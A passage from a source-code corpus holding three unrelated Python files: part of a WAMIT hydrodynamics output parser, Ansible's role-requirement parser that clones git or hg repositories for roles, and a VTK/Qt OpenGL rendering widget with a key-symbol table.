ssy_all = ex_all.copy()
ssy_phase_all = ex_all.copy()
haskind_all = ex_all.copy()
haskind_phase_all = ex_all.copy()
count_diff2 = 0
count_rao2 = 0
count_ssy2 = 0
count_haskind2 = 0
for i, line in enumerate(raw):
count_diff = 0
count_rao = 0
count_ssy = 0
count_haskind = 0
if "DIFFRACTION EXCITING FORCES AND MOMENTS" in line:
count_diff += 1
count_diff2 += 1
count_wave_dir = 0
count = 0
while count_wave_dir < wave_dir.size:
count += 1
if "Wave Heading (deg) :" in raw[i+count_diff + count]:
count_wave_dir += 1
temp_line = raw[i+count_diff+count+4]
count2 = 0
while temp_line != empty_line:
count2 += 1
ex_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_diff2-1] = float(temp_line.split()[1])
phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_diff2-1] = float(temp_line.split()[2])
temp_line = raw[i+count_diff+count+4+count2]
if "RESPONSE AMPLITUDE OPERATORS" in line:
count_rao += 1
count_rao2 += 1
count_wave_dir = 0
count = 0
while count_wave_dir < wave_dir.size:
count += 1
if "Wave Heading (deg) :" in raw[i+count_rao + count]:
count_wave_dir += 1
temp_line = raw[i+count_rao+count+4]
count2 = 0
while temp_line != empty_line:
count2 += 1
rao_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_rao2-1] = float(temp_line.split()[1])
rao_phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_rao2-1] = float(temp_line.split()[2])
temp_line = raw[i+count_rao+count+4+count2]
if "HASKIND EXCITING FORCES AND MOMENTS" in line:
count_haskind += 1
count_haskind2 += 1
count_wave_dir = 0
count = 0
while count_wave_dir < wave_dir.size:
count += 1
if "Wave Heading (deg) :" in raw[i+count_haskind + count]:
count_wave_dir += 1
temp_line = raw[i+count_ssy+count+4]
count2 = 0
while temp_line != empty_line:
count2 += 1
haskind_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_haskind2-1] = float(temp_line.split()[1])
haskind_phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_haskind2-1] = float(temp_line.split()[2])
temp_line = raw[i+count_ssy+count+4+count2]
if "SURGE, SWAY & YAW DRIFT FORCES (Momentum Conservation)" in line:
count_ssy += 1
count_ssy2 += 1
count_wave_dir = 0
count = 0
while count_wave_dir < wave_dir.size:
count += 1
if "Wave Heading (deg) :" in raw[i+count_ssy + count]:
count_wave_dir += 1
temp_line = raw[i+count_ssy+count+4]
count2 = 0
while temp_line != empty_line:
count2 += 1
ssy_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_ssy2-1] = float(temp_line.split()[1])
ssy_phase_all[int(temp_line.split()[0])-1,count_wave_dir-1,count_ssy2-1] = float(temp_line.split()[2])
temp_line = raw[i+count_ssy+count+4+count2]
if os.path.exists(self.files['3sc']):
sc_re = np.zeros([6*num_bodies,wave_dir.size,T.size])
sc_im = sc_re.copy()
sc_phase = sc_re.copy()
sc_mag = sc_re.copy()
scattering = np.loadtxt(self.files['3sc'],skiprows=1)
line_count = 0
for freq_n in xrange(T.size):
for beta_n in xrange(wave_dir.size):
wave_dir_hold = scattering[line_count][1]
while line_count < scattering.shape[0] and scattering[line_count][1] == wave_dir_hold:
comp = int(scattering[line_count][2])-1
sc_mag[comp,beta_n,freq_n] = scattering[line_count][3]
sc_phase[comp,beta_n,freq_n] = scattering[line_count][4]
sc_re[comp,beta_n,freq_n] = scattering[line_count][5]
sc_im[comp,beta_n,freq_n] = scattering[line_count][6]
wave_dir_hold = scattering[line_count][1]
line_count += 1
else:
print '\tThe file ' + self.files['3sc'] + ' does not exist... not reading scattering coefficients.'
if os.path.exists(self.files['3fk']):
fk_re = np.zeros([6*num_bodies,wave_dir.size,T.size])
fk_im = fk_re.copy()
fk_phase = fk_re.copy()
fk_mag = fk_re.copy()
fk = np.loadtxt(self.files['3fk'],skiprows=1)
line_count = 0
for freq_n in xrange(T.size):
for beta_n in xrange(wave_dir.size):
wave_dir_hold = fk[line_count][1]
while line_count < fk.shape[0] and fk[line_count][1] == wave_dir_hold:
comp = int(fk[line_count][2])-1
fk_mag[comp,beta_n,freq_n] = fk[line_count][3]
fk_phase[comp,beta_n,freq_n] = fk[line_count][4]
fk_re[comp,beta_n,freq_n] = fk[line_count][5]
fk_im[comp,beta_n,freq_n] = fk[line_count][6]
wave_dir_hold = scattering[line_count][1]
line_count += 1
else:
print '\tThe file ' + self.files['3fk'] + ' does not exist... not reading froud krylof coefficients.'
# Load data into the hydrodata structure
for i in xrange(num_bodies):
self.body[i] = bem.HydrodynamicData()
self.body[i].scaled = self.scaled
self.body[i].g = self.g
self.body[i].rho = self.rho
self.body[i].body_num = i
self.body[i].name = name[i][0:-4]
self.body[i].water_depth = water_depth
self.body[i].num_bodies = num_bodies
self.body[i].cg = cg[i]
self.body[i].cb = cb[i]
self.body[i].k = k[i]
self.body[i].disp_vol = disp_vol[i]
self.body[i].wave_dir = wave_dir
self.body[i].T = T
self.body[i].w = 2.0*np.pi/self.body[i].T
if 'am_inf' in locals():
self.body[i].am.inf = am_inf[6*i:6+6*i,:]
else:
self.body[i].am.inf = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain infinite frequency added mass coefficients'
if 'am_zero' in locals():
self.body[i].am.zero = am_zero[6*i:6+6*i,:]
else:
self.body[i].am.zero = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain zero frequency added mass coefficients'
if 'am_all' in locals():
self.body[i].am.all = am_all[6*i:6+6*i,:,:]
else:
self.body[i].am.all = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any frequency dependent added mass coefficients'
if 'rd_all' in locals():
self.body[i].rd.all = rd_all[6*i:6+6*i,:,:]
else:
self.body[i].rd.all = np.nan*np.zeros([6*num_bodies,6*num_bodies,self.body[i].T.size])
print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any frequency dependent radiation damping coefficients'
if 'ex_all' in locals():
self.body[i].ex.mag = ex_all[6*i:6+6*i,:,:]
self.body[i].ex.phase = np.deg2rad(phase_all[6*i:6+6*i,:,:])
self.body[i].ex.re = self.body[i].ex.mag*np.cos(self.body[i].ex.phase)
self.body[i].ex.im = self.body[i].ex.mag*np.sin(self.body[i].ex.phase)
else:
print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any excitation coefficients'
if 'sc_mag' in locals():
self.body[i].ex.sc.mag = sc_mag[6*i:6+6*i,:,:]
self.body[i].ex.sc.phase = np.deg2rad(sc_phase[6*i:6+6*i,:,:])
self.body[i].ex.sc.re = sc_re[6*i:6+6*i,:,:]
self.body[i].ex.sc.im = sc_im[6*i:6+6*i,:,:]
else:
pass
# print 'Warning: body ' + str(i) + ' - The WAMTI .3sc file specified does not contain any scattering coefficients'
if 'fk_mag' in locals():
self.body[i].ex.fk.mag = fk_mag[6*i:6+6*i,:,:]
self.body[i].ex.fk.phase = np.deg2rad(fk_phase[6*i:6+6*i,:,:])
self.body[i].ex.fk.re = fk_re[6*i:6+6*i,:,:]
self.body[i].ex.fk.im = fk_im[6*i:6+6*i,:,:]
else:
pass
# print 'Warning: body ' + str(i) + ' - The WAMTI .3fk file specified does not contain any froude krylof coefficients'
if 'rao_all' in locals():
self.body[i].rao.mag = rao_all[6*i:6+6*i,:,:]
self.body[i].rao.phase = np.deg2rad(phase_all[6*i:6+6*i,:,:])
self.body[i].rao.re = self.body[i].rao.mag*np.cos(self.body[i].rao.phase)
self.body[i].rao.im = self.body[i].rao.mag*np.sin(self.body[i].rao.phase)
else:
print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any rao data'
if 'ssy_all' in locals():
self.body[i].ssy.mag = ssy_all[6*i:6+6*i,:,:]
self.body[i].ssy.phase = np.deg2rad(phase_all[6*i:6+6*i,:,:])
self.body[i].ssy.re = self.body[i].ssy.mag*np.cos(self.body[i].ssy.phase)
self.body[i].ssy.im = self.body[i].ssy.mag*np.sin(self.body[i].ssy.phase)
else:
print 'Warning: body ' + str(i) + ' - The WAMTI .out file specified does not contain any rao data'
self.body[i].bem_raw_data = raw
self.body[i].bem_code = code
self.body[i].scale(scale=self.scaled_at_read)
def read(out_file, density=1000., gravity=9.81, scale=False):
'''
Function to read WAMIT data into a data object of type(WamitOutput)
Parameters:
out_file : str
Name of the wamit .out output file. In order to read scattering
and Froud-Krylof forces the .3sc (scatterin) and .3fk
(Froud-Krylof) coefficinet files must have the same base name
as the .out file.
density : float, optional
Water density used to scale the hydrodynamic coefficient data
gravity : float, optional
Acceleration due to gravity used to scale the hydrodynamic
coefficient data
scale : bool, optional
Boolean value to determine if the hydrodynamic data is scaled.
See the bemio.data_structures.bem.scale function for more
information
Returns:
wamit_data
A WamitData object that contains the data from the WAMIT .out
file specified
Examples:
The following example assumes there is a WAMIT output file named
`wamit.out`
>>> wamit_data = read(out_file=wamit.out)
'''
wamit_data = WamitOutput(out_file, density, gravity, scale)
return wamit_data
|
NREL/OpenWARP
|
source/automated_test/bemio/io/wamit.py
|
Python
|
apache-2.0
| 21,188
|
[
"exciting"
] |
5439f79f336abf90cf4edddaad7d7e43d37952a40c4a49e58a63c224a664ccd3
|
# (c) 2014 Michael DeHaan, <michael@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import string_types
import os
import shutil
import subprocess
import tempfile
from ansible.errors import AnsibleError
from ansible.playbook.role.definition import RoleDefinition
__all__ = ['RoleRequirement']
VALID_SPEC_KEYS = [
'name',
'role',
'scm',
'src',
'version',
]
class RoleRequirement(RoleDefinition):
"""
FIXME: document various ways role specs can be specified
"""
def __init__(self):
pass
@staticmethod
def repo_url_to_role_name(repo_url):
# gets the role name out of a repo like
# http://git.example.com/repos/repo.git" => "repo"
if '://' not in repo_url and '@' not in repo_url:
return repo_url
trailing_path = repo_url.split('/')[-1]
if trailing_path.endswith('.git'):
trailing_path = trailing_path[:-4]
if trailing_path.endswith('.tar.gz'):
trailing_path = trailing_path[:-7]
if ',' in trailing_path:
trailing_path = trailing_path.split(',')[0]
return trailing_path
@staticmethod
def role_spec_parse(role_spec):
# takes a repo and a version like
# git+http://git.example.com/repos/repo.git,v1.0
# and returns a list of properties such as:
# {
# 'scm': 'git',
# 'src': 'http://git.example.com/repos/repo.git',
# 'version': 'v1.0',
# 'name': 'repo'
# }
default_role_versions = dict(git='master', hg='tip')
role_spec = role_spec.strip()
role_version = ''
if role_spec == "" or role_spec.startswith("#"):
return (None, None, None, None)
tokens = [s.strip() for s in role_spec.split(',')]
# assume https://github.com URLs are git+https:// URLs and not
# tarballs unless they end in '.zip'
if 'github.com/' in tokens[0] and not tokens[0].startswith("git+") and not tokens[0].endswith('.tar.gz'):
tokens[0] = 'git+' + tokens[0]
if '+' in tokens[0]:
(scm, role_url) = tokens[0].split('+')
else:
scm = None
role_url = tokens[0]
if len(tokens) >= 2:
role_version = tokens[1]
if len(tokens) == 3:
role_name = tokens[2]
else:
role_name = RoleRequirement.repo_url_to_role_name(tokens[0])
if scm and not role_version:
role_version = default_role_versions.get(scm, '')
return dict(scm=scm, src=role_url, version=role_version, name=role_name)
@staticmethod
def role_yaml_parse(role):
if isinstance(role, string_types):
name = None
scm = None
src = None
version = None
if ',' in role:
if role.count(',') == 1:
(src, version) = role.strip().split(',', 1)
elif role.count(',') == 2:
(src, version, name) = role.strip().split(',', 2)
else:
raise AnsibleError("Invalid role line (%s). Proper format is 'role_name[,version[,name]]'" % role)
else:
src = role
if name is None:
name = RoleRequirement.repo_url_to_role_name(src)
if '+' in src:
(scm, src) = src.split('+', 1)
return dict(name=name, src=src, scm=scm, version=version)
if 'role' in role:
# Old style: {role: "galaxy.role,version,name", other_vars: "here" }
role = RoleRequirement.role_spec_parse(role['role'])
else:
role = role.copy()
# New style: { src: 'galaxy.role,version,name', other_vars: "here" }
if 'github.com' in role["src"] and 'http' in role["src"] and '+' not in role["src"] and not role["src"].endswith('.tar.gz'):
role["src"] = "git+" + role["src"]
if '+' in role["src"]:
(scm, src) = role["src"].split('+')
role["scm"] = scm
role["src"] = src
if 'name' not in role:
role["name"] = RoleRequirement.repo_url_to_role_name(role["src"])
if 'version' not in role:
role['version'] = ''
if 'scm' not in role:
role['scm'] = None
for key in role.keys():
if key not in VALID_SPEC_KEYS:
role.pop(key)
return role
@staticmethod
def scm_archive_role(src, scm='git', name=None, version='HEAD'):
if scm not in ['hg', 'git']:
raise AnsibleError("- scm %s is not currently supported" % scm)
tempdir = tempfile.mkdtemp()
clone_cmd = [scm, 'clone', src, name]
with open('/dev/null', 'w') as devnull:
try:
popen = subprocess.Popen(clone_cmd, cwd=tempdir, stdout=devnull, stderr=devnull)
except:
raise AnsibleError("error executing: %s" % " ".join(clone_cmd))
rc = popen.wait()
if rc != 0:
raise AnsibleError ("- command %s failed in directory %s (rc=%s)" % (' '.join(clone_cmd), tempdir, rc))
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.tar')
if scm == 'hg':
archive_cmd = ['hg', 'archive', '--prefix', "%s/" % name]
if version:
archive_cmd.extend(['-r', version])
archive_cmd.append(temp_file.name)
if scm == 'git':
archive_cmd = ['git', 'archive', '--prefix=%s/' % name, '--output=%s' % temp_file.name]
if version:
archive_cmd.append(version)
else:
archive_cmd.append('HEAD')
with open('/dev/null', 'w') as devnull:
popen = subprocess.Popen(archive_cmd, cwd=os.path.join(tempdir, name),
stderr=devnull, stdout=devnull)
rc = popen.wait()
if rc != 0:
raise AnsibleError("- command %s failed in directory %s (rc=%s)" % (' '.join(archive_cmd), tempdir, rc))
shutil.rmtree(tempdir, ignore_errors=True)
return temp_file.name
|
shawnsi/ansible
|
lib/ansible/playbook/role/requirement.py
|
Python
|
gpl-3.0
| 6,986
|
[
"Galaxy"
] |
3c4895e31a4a673940fc59e27ee8f1070f7d2ca16bcba4569a880f8fe95118fb
|
"""
A simple VTK widget for PyQt or PySide.
See http://www.trolltech.com for Qt documentation,
http://www.riverbankcomputing.co.uk for PyQt, and
http://pyside.github.io for PySide.
This class is based on the vtkGenericRenderWindowInteractor and is
therefore fairly powerful. It should also play nicely with the
vtk3DWidget code.
Created by Prabhu Ramachandran, May 2002
Based on David Gobbi's QVTKRenderWidget.py
Changes by Gerard Vermeulen Feb. 2003
Win32 support.
Changes by Gerard Vermeulen, May 2003
Bug fixes and better integration with the Qt framework.
Changes by Phil Thompson, Nov. 2006
Ported to PyQt v4.
Added support for wheel events.
Changes by Phil Thompson, Oct. 2007
Bug fixes.
Changes by Phil Thompson, Mar. 2008
Added cursor support.
Changes by Rodrigo Mologni, Sep. 2013 (Credit to Daniele Esposti)
Bug fix to PySide: Converts PyCObject to void pointer.
Changes by Greg Schussman, Aug. 2014
The keyPressEvent function now passes keysym instead of None.
Changes by Alex Tsui, Apr. 2015
Port from PyQt4 to PyQt5.
Changes by Fabian Wenzel, Jan. 2016
Support for Python3
"""
# Check whether a specific PyQt implementation was chosen
try:
import vtk.qt
PyQtImpl = vtk.qt.PyQtImpl
except ImportError:
pass
if PyQtImpl is None:
# Autodetect the PyQt implementation to use
try:
import PyQt5
PyQtImpl = "PyQt5"
except ImportError:
try:
import PyQt4
PyQtImpl = "PyQt4"
except ImportError:
try:
import PySide
PyQtImpl = "PySide"
except ImportError:
raise ImportError("Cannot load either PyQt or PySide")
if PyQtImpl == "PyQt5":
from PyQt5.QtWidgets import QWidget
from PyQt5.QtWidgets import QSizePolicy
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QTimer
from PyQt5.QtCore import QObject
from PyQt5.QtCore import QSize
from PyQt5.QtCore import QEvent
from PyQt5 import QtOpenGL
elif PyQtImpl == "PyQt4":
from PyQt4.QtGui import QWidget
from PyQt4.QtGui import QSizePolicy
from PyQt4.QtGui import QApplication
from PyQt4.QtCore import Qt
from PyQt4.QtCore import QTimer
from PyQt4.QtCore import QObject
from PyQt4.QtCore import QSize
from PyQt4.QtCore import QEvent
from PyQt4 import QtOpenGL
elif PyQtImpl == "PySide":
from PySide.QtGui import QWidget
from PySide.QtGui import QSizePolicy
from PySide.QtGui import QApplication
from PySide.QtCore import Qt
from PySide.QtCore import QTimer
from PySide.QtCore import QObject
from PySide.QtCore import QSize
from PySide.QtCore import QEvent
else:
raise ImportError("Unknown PyQt implementation " + repr(PyQtImpl))
class VTKQGLWidget(QtOpenGL.QGLWidget):
""" A QGLVTKWidget for Python and Qt. Uses a
vtkGenericRenderWindowInteractor to handle the interactions. Use
GetRenderWindow() to get the vtkRenderWindow. Create with the
keyword stereo=1 in order to generate a stereo-capable window.
The user interface is summarized in vtkInteractorStyle.h:
- Keypress j / Keypress t: toggle between joystick (position
sensitive) and trackball (motion sensitive) styles. In joystick
style, motion occurs continuously as long as a mouse button is
pressed. In trackball style, motion occurs when the mouse button
is pressed and the mouse pointer moves.
- Keypress c / Keypress o: toggle between camera and object
(actor) modes. In camera mode, mouse events affect the camera
position and focal point. In object mode, mouse events affect
the actor that is under the mouse pointer.
- Button 1: rotate the camera around its focal point (if camera
mode) or rotate the actor around its origin (if actor mode). The
rotation is in the direction defined from the center of the
renderer's viewport towards the mouse position. In joystick mode,
the magnitude of the rotation is determined by the distance the
mouse is from the center of the render window.
- Button 2: pan the camera (if camera mode) or translate the actor
(if object mode). In joystick mode, the direction of pan or
translation is from the center of the viewport towards the mouse
position. In trackball mode, the direction of motion is the
direction the mouse moves. (Note: with 2-button mice, pan is
defined as <Shift>-Button 1.)
- Button 3: zoom the camera (if camera mode) or scale the actor
(if object mode). Zoom in/increase scale if the mouse position is
in the top half of the viewport; zoom out/decrease scale if the
mouse position is in the bottom half. In joystick mode, the amount
of zoom is controlled by the distance of the mouse pointer from
the horizontal centerline of the window.
- Keypress 3: toggle the render window into and out of stereo
mode. By default, red-blue stereo pairs are created. Some systems
support Crystal Eyes LCD stereo glasses; you have to invoke
SetStereoTypeToCrystalEyes() on the rendering window. Note: to
use stereo you also need to pass a stereo=1 keyword argument to
the constructor.
- Keypress e: exit the application.
- Keypress f: fly to the picked point
- Keypress p: perform a pick operation. The render window interactor
has an internal instance of vtkCellPicker that it uses to pick.
- Keypress r: reset the camera view along the current view
direction. Centers the actors and moves the camera so that all actors
are visible.
- Keypress s: modify the representation of all actors so that they
are surfaces.
- Keypress u: invoke the user-defined function. Typically, this
keypress will bring up an interactor that you can type commands in.
- Keypress w: modify the representation of all actors so that they
are wireframe.
"""
# Map between VTK and Qt cursors.
_CURSOR_MAP = {
0: Qt.ArrowCursor, # VTK_CURSOR_DEFAULT
1: Qt.ArrowCursor, # VTK_CURSOR_ARROW
2: Qt.SizeBDiagCursor, # VTK_CURSOR_SIZENE
3: Qt.SizeFDiagCursor, # VTK_CURSOR_SIZENWSE
4: Qt.SizeBDiagCursor, # VTK_CURSOR_SIZESW
5: Qt.SizeFDiagCursor, # VTK_CURSOR_SIZESE
6: Qt.SizeVerCursor, # VTK_CURSOR_SIZENS
7: Qt.SizeHorCursor, # VTK_CURSOR_SIZEWE
8: Qt.SizeAllCursor, # VTK_CURSOR_SIZEALL
9: Qt.PointingHandCursor, # VTK_CURSOR_HAND
10: Qt.CrossCursor, # VTK_CURSOR_CROSSHAIR
}
def __init__(self, parent=None, wflags=Qt.WindowFlags()):
# the current button
self._ActiveButton = Qt.NoButton
# private attributes
self.__saveX = 0
self.__saveY = 0
self.__saveModifiers = Qt.NoModifier
self.__saveButtons = Qt.NoButton
# create qt-level widget
#QtOpenGL.QGLWidget.__init__(self, parent, wflags|Qt.MSWindowsOwnDC)
glFormat = QtOpenGL.QGLFormat()
glFormat.setAlpha(True)
QtOpenGL.QGLWidget.__init__(self, glFormat, parent)
WId = self.winId()
# Python2
if type(WId).__name__ == 'PyCObject':
from ctypes import pythonapi, c_void_p, py_object
pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
WId = pythonapi.PyCObject_AsVoidPtr(WId)
# Python3
elif type(WId).__name__ == 'PyCapsule':
from ctypes import pythonapi, c_void_p, py_object, c_char_p
pythonapi.PyCapsule_GetName.restype = c_char_p
pythonapi.PyCapsule_GetName.argtypes = [py_object]
name = pythonapi.PyCapsule_GetName(WId)
pythonapi.PyCapsule_GetPointer.restype = c_void_p
pythonapi.PyCapsule_GetPointer.argtypes = [py_object, c_char_p]
WId = pythonapi.PyCapsule_GetPointer(WId, name)
# Create the render window
self.__RenderWindow = vtk.vtkRenderWindow()
self.__RenderWindow.SetWindowInfo(str(int(WId)))
# Create the render window interactor
self.__Iren = vtk.vtkGenericRenderWindowInteractor()
self.__Iren.SetRenderWindow(self.__RenderWindow)
# Add a renderer
self.__Renderer = vtk.vtkRenderer()
self.__RenderWindow.AddRenderer(self.__Renderer)
# do all the necessary qt setup
self.setAttribute(Qt.WA_OpaquePaintEvent)
self.setAttribute(Qt.WA_PaintOnScreen)
self.setMouseTracking(True) # get all mouse events
self.setFocusPolicy(Qt.WheelFocus)
self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
self._Timer = QTimer(self)
self._Timer.timeout.connect(self.TimerEvent)
self.__Iren.SetInteractorStyle(vtk.vtkInteractorStyleTrackballCamera())
self.__Iren.AddObserver('CreateTimerEvent', self.CreateTimer)
self.__Iren.AddObserver('DestroyTimerEvent', self.DestroyTimer)
self.__Iren.GetRenderWindow().AddObserver('CursorChangedEvent',
self.CursorChangedEvent)
#Create a hidden child widget and connect its destroyed signal to its
#parent ``Finalize`` slot. The hidden children will be destroyed before
#its parent thus allowing cleanup of VTK elements.
self._hidden = QWidget(self)
self._hidden.hide()
self._hidden.destroyed.connect(self.Finalize)
# Do it here to be ready (added by Papazov)
self.Initialize()
def enable_depthpeeling(self, max_num_of_peels = 4):
# 1. Use a render window with alpha bits (as initial value is 0 (false)):
self.__RenderWindow.SetAlphaBitPlanes(True)
# 2. Force to not pick a framebuffer with a multisample buffer
# (as initial value is 8):
self.__RenderWindow.SetMultiSamples(0)
# 3. Choose to use depth peeling (if supported) (initial value is 0 (false)):
self.__Renderer.SetUseDepthPeeling(True)
# 4. Set depth peeling parameters
# - Set the maximum number of rendering passes (initial value is 4):
self.__Renderer.SetMaximumNumberOfPeels(max_num_of_peels)
# - Set the occlusion ratio (initial value is 0.0, exact image):
self.__Renderer.SetOcclusionRatio(0.0)
def __getattr__(self, attr):
"""Makes the object behave like a vtkGenericRenderWindowInteractor"""
if attr == '__vtk__':
return lambda t=self.__Iren: t
elif hasattr(self.__Iren, attr):
return getattr(self.__Iren, attr)
else:
raise AttributeError(self.__class__.__name__ +
" has no attribute named " + attr)
def Finalize(self):
'''
Call internal cleanup method on VTK objects
'''
self.__RenderWindow.Finalize()
def CreateTimer(self, obj, evt):
self._Timer.start(10)
def DestroyTimer(self, obj, evt):
self._Timer.stop()
return 1
def TimerEvent(self):
self.__Iren.TimerEvent()
def CursorChangedEvent(self, obj, evt):
"""Called when the CursorChangedEvent fires on the render window."""
# This indirection is needed since when the event fires, the current
# cursor is not yet set so we defer this by which time the current
# cursor should have been set.
QTimer.singleShot(0, self.ShowCursor)
def HideCursor(self):
"""Hides the cursor."""
self.setCursor(Qt.BlankCursor)
def ShowCursor(self):
"""Shows the cursor."""
vtk_cursor = self.__Iren.GetRenderWindow().GetCurrentCursor()
qt_cursor = self._CURSOR_MAP.get(vtk_cursor, Qt.ArrowCursor)
self.setCursor(qt_cursor)
def closeEvent(self, evt):
self.Finalize()
def sizeHint(self):
return QSize(400, 400)
def paintEngine(self):
return None
def paintEvent(self, ev):
self.__Iren.Render()
def resizeEvent(self, ev):
w = self.width()
h = self.height()
vtk.vtkRenderWindow.SetSize(self.__RenderWindow, w, h)
self.__Iren.SetSize(w, h)
self.__Iren.ConfigureEvent()
self.update()
def _GetCtrlShift(self, ev):
ctrl = shift = False
if hasattr(ev, 'modifiers'):
if ev.modifiers() & Qt.ShiftModifier:
shift = True
if ev.modifiers() & Qt.ControlModifier:
ctrl = True
else:
if self.__saveModifiers & Qt.ShiftModifier:
shift = True
if self.__saveModifiers & Qt.ControlModifier:
ctrl = True
return ctrl, shift
def enterEvent(self, ev):
ctrl, shift = self._GetCtrlShift(ev)
self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
ctrl, shift, chr(0), 0, None)
self.__Iren.EnterEvent()
def leaveEvent(self, ev):
ctrl, shift = self._GetCtrlShift(ev)
self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
ctrl, shift, chr(0), 0, None)
self.__Iren.LeaveEvent()
def mousePressEvent(self, ev):
ctrl, shift = self._GetCtrlShift(ev)
repeat = 0
if ev.type() == QEvent.MouseButtonDblClick:
repeat = 1
self.__Iren.SetEventInformationFlipY(ev.x(), ev.y(),
ctrl, shift, chr(0), repeat, None)
self._ActiveButton = ev.button()
if self._ActiveButton == Qt.LeftButton:
self.__Iren.LeftButtonPressEvent()
elif self._ActiveButton == Qt.RightButton:
self.__Iren.RightButtonPressEvent()
elif self._ActiveButton == Qt.MidButton:
self.__Iren.MiddleButtonPressEvent()
def mouseReleaseEvent(self, ev):
ctrl, shift = self._GetCtrlShift(ev)
self.__Iren.SetEventInformationFlipY(ev.x(), ev.y(),
ctrl, shift, chr(0), 0, None)
if self._ActiveButton == Qt.LeftButton:
self.__Iren.LeftButtonReleaseEvent()
elif self._ActiveButton == Qt.RightButton:
self.__Iren.RightButtonReleaseEvent()
elif self._ActiveButton == Qt.MidButton:
self.__Iren.MiddleButtonReleaseEvent()
def mouseMoveEvent(self, ev):
self.__saveModifiers = ev.modifiers()
self.__saveButtons = ev.buttons()
self.__saveX = ev.x()
self.__saveY = ev.y()
ctrl, shift = self._GetCtrlShift(ev)
self.__Iren.SetEventInformationFlipY(ev.x(), ev.y(),
ctrl, shift, chr(0), 0, None)
self.__Iren.MouseMoveEvent()
def keyPressEvent(self, ev):
ctrl, shift = self._GetCtrlShift(ev)
if ev.key() < 256:
key = str(ev.text())
else:
key = chr(0)
keySym = _qt_key_to_key_sym(ev.key())
if shift and len(keySym) == 1 and keySym.isalpha():
keySym = keySym.upper()
self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
ctrl, shift, key, 0, keySym)
self.__Iren.KeyPressEvent()
self.__Iren.CharEvent()
def keyReleaseEvent(self, ev):
ctrl, shift = self._GetCtrlShift(ev)
if ev.key() < 256:
key = chr(ev.key())
else:
key = chr(0)
self.__Iren.SetEventInformationFlipY(self.__saveX, self.__saveY,
ctrl, shift, key, 0, None)
self.__Iren.KeyReleaseEvent()
def wheelEvent(self, ev):
if ev.angleDelta().y() >= 0: # Change
self.__Iren.MouseWheelForwardEvent()
else:
self.__Iren.MouseWheelBackwardEvent()
@property
def interactor(self):
return self.__Iren
@property
def render_window_interactor(self):
return self.__Iren
@property
def render_window(self):
return self.__RenderWindow
@property
def renderer(self):
return self.__Renderer
def Render(self):
self.update()
_keysyms = {
Qt.Key_Backspace: 'BackSpace',
Qt.Key_Tab: 'Tab',
Qt.Key_Backtab: 'Tab',
# Qt.Key_Clear : 'Clear',
Qt.Key_Return: 'Return',
Qt.Key_Enter: 'Return',
Qt.Key_Shift: 'Shift_L',
Qt.Key_Control: 'Control_L',
Qt.Key_Alt: 'Alt_L',
Qt.Key_Pause: 'Pause',
Qt.Key_CapsLock: 'Caps_Lock',
Qt.Key_Escape: 'Escape',
Qt.Key_Space: 'space',
# Qt.Key_Prior : 'Prior',
# Qt.Key_Next : 'Next',
Qt.Key_End: 'End',
Qt.Key_Home: 'Home',
Qt.Key_Left: 'Left',
Qt.Key_Up: 'Up',
Qt.Key_Right: 'Right',
Qt.Key_Down: 'Down',
Qt.Key_SysReq: 'Snapshot',
Qt.Key_Insert: 'Insert',
Qt.Key_Delete: 'Delete',
Qt.Key_Help: 'Help',
Qt.Key_0: '0',
Qt.Key_1: '1',
Qt.Key_2: '2',
Qt.Key_3: '3',
Qt.Key_4: '4',
Qt.Key_5: '5',
Qt.Key_6: '6',
Qt.Key_7: '7',
Qt.Key_8: '8',
Qt.Key_9: '9',
Qt.Key_A: 'a',
Qt.Key_B: 'b',
Qt.Key_C: 'c',
Qt.Key_D: 'd',
Qt.Key_E: 'e',
Qt.Key_F: 'f',
Qt.Key_G: 'g',
Qt.Key_H: 'h',
Qt.Key_I: 'i',
Qt.Key_J: 'j',
Qt.Key_K: 'k',
Qt.Key_L: 'l',
Qt.Key_M: 'm',
Qt.Key_N: 'n',
Qt.Key_O: 'o',
Qt.Key_P: 'p',
Qt.Key_Q: 'q',
Qt.Key_R: 'r',
Qt.Key_S: 's',
Qt.Key_T: 't',
Qt.Key_U: 'u',
Qt.Key_V: 'v',
Qt.Key_W: 'w',
Qt.Key_X: 'x',
Qt.Key_Y: 'y',
Qt.Key_Z: 'z',
Qt.Key_Asterisk: 'asterisk',
Qt.Key_Plus: 'plus',
Qt.Key_Minus: 'minus',
Qt.Key_Period: 'period',
Qt.Key_Slash: 'slash',
Qt.Key_F1: 'F1',
Qt.Key_F2: 'F2',
Qt.Key_F3: 'F3',
